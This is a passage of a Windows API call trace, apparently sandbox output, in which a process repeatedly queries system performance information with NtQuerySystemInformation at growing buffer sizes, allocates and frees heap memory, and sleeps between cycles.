[0280.725] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0280.726] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0280.726] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.726] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0280.726] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.727] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.727] Sleep (dwMilliseconds=0x110) [0280.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0280.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0280.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0280.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0280.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0280.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0280.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.734] Sleep (dwMilliseconds=0x110) [0280.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0280.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0280.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0280.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0280.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0280.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0280.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0280.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0280.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.754] Sleep (dwMilliseconds=0x110) [0280.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0280.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0280.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0280.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0280.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0280.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0280.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0280.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0280.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.765] Sleep (dwMilliseconds=0x110) [0280.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0280.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0280.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0280.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0280.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0280.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0280.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0280.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0280.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.783] Sleep (dwMilliseconds=0x110) [0280.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0280.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0280.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0280.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0280.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0280.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0280.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0280.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0280.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.799] Sleep (dwMilliseconds=0x110) [0280.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0280.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0280.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0280.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0280.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0280.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0280.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.816] Sleep (dwMilliseconds=0x110) [0280.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0280.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0280.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0280.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0280.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.845] Sleep (dwMilliseconds=0x110) [0280.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0280.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0280.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0280.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0280.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0280.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0280.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.861] Sleep (dwMilliseconds=0x110) [0280.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0280.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0280.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0280.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0280.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0280.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0280.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0280.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0280.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.878] Sleep (dwMilliseconds=0x110) [0280.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0280.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0280.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0280.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0280.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0280.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0280.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0280.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0280.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.891] Sleep (dwMilliseconds=0x110) [0280.918] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.918] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0280.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0280.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0280.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0280.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0280.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0280.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.925] Sleep (dwMilliseconds=0x110) [0280.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0280.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0280.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0280.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0280.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0280.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0280.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0280.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0280.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.956] Sleep (dwMilliseconds=0x110) [0280.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0280.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0280.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0280.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0280.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0280.979] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0280.980] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0280.980] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.981] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0280.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.984] Sleep (dwMilliseconds=0x110) [0281.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0281.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0281.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0281.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 